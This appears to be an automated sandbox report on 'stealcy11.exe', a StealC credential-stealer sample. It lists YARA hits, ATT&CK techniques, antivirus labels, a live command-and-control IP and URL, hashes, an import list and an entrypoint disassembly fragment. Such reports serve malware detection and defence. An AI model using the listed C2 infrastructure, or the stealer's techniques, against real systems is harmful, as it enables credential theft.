                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009046C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, | 0_2_009046C0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_00903E10 lstrcpy,lstrcpy,GetSystemTime, | 0_2_00903E10
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009029E0 GetProcessHeap,HeapAlloc,GetUserNameA, | 0_2_009029E0
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: stealcy11.exe, type: SAMPLE
                  Source: Yara match | File source: 0.2.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; file source: stealcy11.exe, type: SAMPLE
Source: Yara match; file source: 0.2.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 0.0.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
Source: Yara match; file source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix. A count in parentheses marks a technique that signatures in this analysis matched; entries without a count are the matrix's unmatched placeholder cells, listed here column by column in the order they appear.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (1); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (31); Virtualization/Sandbox Evasion (1); Process Discovery (12); Account Discovery (1); System Owner/User Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (12); Ingress Tool Transfer (1); Application Layer Protocol (11); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus Detection (source | detection | scanner | label)
stealcy11.exe | 61% | ReversingLabs | Win32.Trojan.StealC
stealcy11.exe | 57% | Virustotal |
stealcy11.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
stealcy11.exe | 100% | Joe Sandbox ML |
No Antivirus matches in the remaining four detection categories.
Domains (name | IP | active | malicious | reputation)
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | high

URLs (name | malicious | reputation)
https:/135.181.65.216/ee45b7c5e4cb75cb.php | true | unknown

URLs found in memory or dropped files (name | source | malicious | reputation)
https://135.181.65.216/W | stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | high
https://135.181.65.216/ | stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://135.181.65.216 | stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | true | unknown
https://135.181.65.216/z | stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmp | false | unknown

The http://upx.sf.net entry is a string from the Amcache hive dropped by WerFault.exe, not from the sample. The only infrastructure attributed to stealcy11.exe itself is 135.181.65.216; the t-msedge.net host is Microsoft CDN background traffic that the cookbook whitelists (see the excluded IPs in the analysis settings below).

IPs (IP | domain | country | ASN | ASN name | malicious)
135.181.65.216 | unknown | Germany | 24940 | HETZNER-AS DE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579700
Start date and time: 2024-12-23 07:57:51 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: stealcy11.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 17
• Number of non-executed functions: 42
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.12.23.50, 20.190.147.2, 20.109.210.53
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
01:59:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Context for s-part-0035.t-0009.t-msedge.net (associated sample or URL | detection | threat name | IP)
skIYOAOzvU.exe | malicious | LummaC | 13.107.246.63
fiFdIrd.txt.js | malicious | Unknown | 13.107.246.63
mPQW1NB2Px.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
uw7vXaPNPF.exe | malicious | Unknown | 13.107.246.63
HOEcO4nqCT.exe | malicious | Unknown | 13.107.246.63
D7M4c24p9T.exe | malicious | Unknown | 13.107.246.63
fW6RLQpTIt.exe | malicious | Cryptbot | 13.107.246.63
gjEtERlBSv.exe | malicious | Socks5Systemz | 13.107.246.63
clip64.dll | malicious | Amadey | 13.107.246.63
https://staging.effimate.toyo.ai-powered-services.com/ | malicious | Unknown | 13.107.246.63

These co-occurrences do not indicate shared attacker infrastructure: 13.107.246.63 is the whitelisted Microsoft CDN address listed under the excluded IPs above, and the domain is rated not malicious with high reputation, so it shows up in the context of nearly every Windows sample.
Context for ASN HETZNER-AS DE (associated sample or URL | detection | threat name | IP)
gVKsiQIHqe.exe | malicious | Vidar | 94.130.188.57
trZG6pItZj.exe | malicious | Vidar | 94.130.188.57
9EI7wrGs4K.exe | malicious | Vidar | 94.130.188.57
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 94.130.188.57
Loader.exe | malicious | RHADAMANTHYS | 213.239.239.164
GoldenContinent.exe | malicious | Vidar | 94.130.188.57
https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/ | malicious | HTMLPhisher | 135.181.58.223
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 94.130.188.57
https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvV | malicious | Unknown | 136.243.5.53
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 94.130.188.57
Dropped files. All five files below were written by WerFault.exe while it handled the crash of stealcy11.exe (PID 7784); the classification string @2/5 counts these same five, so the sample wrote no files of its own before it crashed.

Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9522942431940097
                                Encrypted:false
                                SSDEEP:192:JnrcLw0BU/Hn2nbjvYZrRtozuiFUZ24IO8CnV:Zr4LBU/HMbjeazuiFUY4IO8wV
                                MD5:FC278DED03D45B0F3166CDF831807D81
                                SHA1:73989FEC61CB40D947690AF1CB7DEA21704F1326
                                SHA-256:E0E206B4B216A008490DB87454F6BDAEAA92D55FCB518372A555B373FA36C6CD
                                SHA-512:1975668AB83A326DDE504195F13BDE7B70DBC4DA17F8F546B7E725D2139E00D26B3075EF24C53EF8E596C1EFA7284D2141C02ACBEC1482E40298D30DC08D6DC4
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.0.7.4.5.4.3.7.5.2.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.0.7.4.6.4.2.1.8.9.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.b.3.b.a.b.9.-.b.6.e.f.-.4.3.6.b.-.b.0.d.e.-.5.8.0.f.a.b.6.d.5.4.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.4.6.f.f.7.d.-.c.3.7.1.-.4.6.8.b.-.9.2.2.3.-.4.f.a.7.b.9.9.a.5.4.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.e.a.l.c.y.1.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.6.8.-.0.0.0.1.-.0.0.1.4.-.c.8.9.5.-.0.0.1.a.0.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.9.f.2.1.d.6.6.5.1.9.0.e.a.9.e.3.4.b.8.d.a.d.0.c.d.e.a.d.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.0.5.1.9.5.b.1.a.7.0.f.0.7.8.c.9.1.1.6.9.9.8.d.7.4.8.6.e.6.7.2.d.9.0.e.9.3.2.1.8.!.s.t.e.a.l.c.y.1.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 23 06:59:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):120282
                                Entropy (8bit):1.6038957628368737
                                Encrypted:false
                                SSDEEP:384:klwQmieeEPYKkrZdoJbLz1QGtIfFYA7b/cTtyiu8VD:4wleEPkdodLhMfvoToE
                                MD5:4E91700F1BCB5AC3150E27E2870114B6
                                SHA1:8D1A390953EF4BD6253CE983881A410E90D121CA
                                SHA-256:C73E3AC38CBD587E8ECF027755D01F58358F9AE95375A5DCC2CB23D13427774C
                                SHA-512:737A4730416ED8B700A5F3E44151440A48B186D09111EAA9F548930C6DE0BAFEA569A17C28803142ABF77E6A438B81AC7F5909D09FB5D4861E744B9F98B46A3D
                                Malicious:false
                                Reputation:low
                                Preview:MDMP..a..... .......:.ig.........................................B..........T.......8...........T...........p6..j.......................................................................................................eJ......\ ......GenuineIntel............T.......h...".ig.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8342
                                Entropy (8bit):3.692819113543501
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJgw6PEKqKz6YcDOSUpGdgmfgYpr+89bgAsf2Am:R6lXJP6XqKz6YZSUpGdgmfgqgTfo
                                MD5:6C49D1032EBDFE2751AC4111511D1C9F
                                SHA1:8FA64CB4BCE619B641F8A4A71B4582C6D0819140
                                SHA-256:5D5441F2510D7C0CE75BCB2302707FA264E9309D30F1A11DFE67AFE27ACDF106
                                SHA-512:328DC89BDC4CD1C381470DA6B3A1172673160EA0D51E5EDF4305C1D1E87EE365F82D05F56EA1B13F6263D13DADC692B599A141FAE0851F066F23317279EAE5FB
                                Malicious:false
                                Reputation:low
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.8.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4578
                                Entropy (8bit):4.438496723589363
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsnxJg77aI9roWpW8VYqp/Ym8M4J2LeFlXj+q88sT29sSZWd:uIjfnDI71B7V7kJ2i/OgdZWd
                                MD5:A13386F06A5BA0721149014849899F92
                                SHA1:D619030400BB147AA4A58D0A86AFEFF9794CFEE7
                                SHA-256:75AE618624295B2C6F131BE64BAF6B022B442FC4C86AC923CE5BC937BA713E83
                                SHA-512:1E0D2EC83497F3865AAB5D3AD3AD44E5BDFFCD8DF63FFF1EFF0D08F8B01A3FEB61253F1FBA578FCFB671589D0FC8B2C1C711EC7E0AB288627B563D31F123B361
                                Malicious:false
                                Reputation:low
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643561" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.393732706427489
                                Encrypted:false
                                SSDEEP:6144:Dl4fiJoH0ncNXiUjt10qYG/gaocYGBoaUMMhA2NX4WABlBuNAsOBSqa:B4vFYMYQUMM6VFYSsU
                                MD5:108C36402BFEF432D901AECE821EC476
                                SHA1:C74DBFAE6366A8D8A0A2785B827AA4D4647EE1F3
                                SHA-256:A2E5C1E213D3272840718B1530353E5AC90D8EEDD24DDBD65D8DDBA3B3C7A44B
                                SHA-512:684983DCADD2BDAB8C5F942FE62FD38D6AE90336D5B4E292F01F1580FB635E669C81C87F2F73750FB568EC959AE2AF0DE61B217E3712E52033CB1E070E6A8478
                                Malicious:false
                                Reputation:low
                                Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'.U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.573123644643754
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:stealcy11.exe
                                File size:245'760 bytes
                                MD5:004431fc72fc1228abf10e298efa0271
                                SHA1:05195b1a70f078c9116998d7486e672d90e93218
                                SHA256:082796fccb8ffb566a99ba188cae572eac30f1bf6e11a7bf4e5ebe757bc66c88
                                SHA512:8e1c87b177cd3cd687760f002fea6851ae34b2543df434ed1db4146a33a684f5a386e4e6d9d76bd14e064dd29fe6cc1cb0407cac10abf0c9cd4513eefcac8335
                                SSDEEP:3072:sCFW6ZRlcV3K+gqCClq/oPk1U894z1tJS7pmLUMOmjoRWwhSeUReHeP3KqX+n:j1J7+go0U8evIFmLu6kKeot+
                                TLSH:6D341925DF41403FEE12867CD6F963D1B22669A46322D8D733CC25198DF40E32D7E6AA
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L...!.gg...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0x421bd0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6767E521 [Sun Dec 22 10:08:33 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: d071ac95ea1d6b0ed6ec53017449901f
Instruction (entrypoint preview, disassembly starting at 0x421bd0)
                                push ebp
                                mov ebp, esp
                                sub esp, 34h
                                push ebx
                                push esi
                                push edi
                                call 00007F2A20F0A257h
                                call 00007F2A20F2DC72h
                                xor ebx, ebx
                                cmp byte ptr [0042D014h], bl
                                je 00007F2A20F2949Fh
                                lea ecx, dword ptr [ecx+00h]
                                inc ebx
                                cmp byte ptr [ebx+0042D014h], 00000000h
                                jne 00007F2A20F29488h
                                lea eax, dword ptr [ebx+01h]
                                call 00007F2A20F0A0D3h
                                mov dword ptr [ebp-10h], eax
                                test eax, eax
                                je 00007F2A20F2949Eh
                                push 0042D014h
                                push eax
                                call dword ptr [00639134h]
                                call dword ptr [006390E4h]
                                movzx eax, ax
                                add eax, FFFFFBE7h
                                cmp eax, 2Ah
                                jnbe 00007F2A20F294A8h
                                movzx eax, byte ptr [eax+00421E54h]
                                jmp dword ptr [00421E4Ch+eax*4]
                                push 00000000h
                                call dword ptr [0063901Ch]
                                call 00007F2A20F2A2C2h
                                mov ecx, dword ptr [00638D40h]
                                call 00007F2A20F2B5F7h
                                test eax, eax
                                jne 00007F2A20F294ADh
                                call 00007F2A20F2A21Eh
                                mov ecx, dword ptr [00638E1Ch]
                                call 00007F2A20F2B5E3h
                                test eax, eax
                                jne 00007F2A20F29499h
                                push eax
                                call dword ptr [0063901Ch]
                                mov edi, dword ptr [00638D40h]
                                push edi
                                call dword ptr [00638FACh]
                                lea esi, dword ptr [ebx+eax]
                                lea eax, dword ptr [esi+01h]
                                call 00007F2A20F0A050h
                                mov ebx, eax
                                mov dword ptr [ebp-34h], ebx
                                test ebx, ebx
                                je 00007F2A20F294ADh
                                mov eax, dword ptr [ebp-10h]
                                test eax, eax
                                je 00007F2A20F294A6h
                                test edi, edi
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36644 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24a000 | 0x3c7c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2951a | 0x29600 | df2d115e7c4d351090d551d0efaa4319 | False | 0.40288071185800606 | data | 6.375878850752631 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0xbba4 | 0xbc00 | 0842159b30b0a5e7723012d6bde04732 | False | 0.5963056848404256 | data | 6.667148204014933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x37000 | 0x212bec | 0xc00 | f7d82f3649bd5266c892c8c1b457e92b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x24a000 | 0x5d00 | 0x5e00 | 62b76e5280e9e60573614263fb763b9c | False | 0.5253075132978723 | data | 5.2508129632036535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
msvcrt.dll | rand, strncpy, ??_V@YAXPAX@Z, strtok, memchr, strtok_s, ??_U@YAPAXI@Z, strcpy_s, vsprintf_s, memmove, strlen, malloc, free, memcmp, ??2@YAPAXI@Z, memset, memcpy, __CxxFrameHandler3, _except_handler3
KERNEL32.dll | InitializeCriticalSectionAndSpinCount, GetStringTypeW, MultiByteToWideChar, LCMapStringW, IsValidCodePage, GetOEMCP, GetACP, lstrlenA, HeapAlloc, GetProcessHeap, VirtualProtect, CreateProcessA, lstrcatA, VirtualQueryEx, OpenProcess, ReadProcessMemory, WriteFile, GetCPInfo, WideCharToMultiByte, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, TerminateProcess, GetCurrentProcess, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, GetProcAddress, GetModuleHandleW, ExitProcess, Sleep, GetStdHandle, GetModuleFileNameW, GetLastError, LoadLibraryW, TlsGetValue, TlsSetValue, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, RaiseException
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:58:48.693601+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.9 | 49712 | 135.181.65.216 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 07:58:43.838241100 CET | 49712 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:43.838290930 CET | 443 | 49712 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:43.838567019 CET | 49712 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:43.854825020 CET | 49712 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:43.854850054 CET | 443 | 49712 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:48.693377018 CET | 443 | 49712 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:48.693600893 CET | 49712 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:48.693717957 CET | 49712 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:48.693751097 CET | 443 | 49712 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:48.694417000 CET | 49723 | 443 | 192.168.2.9 | 135.181.65.216
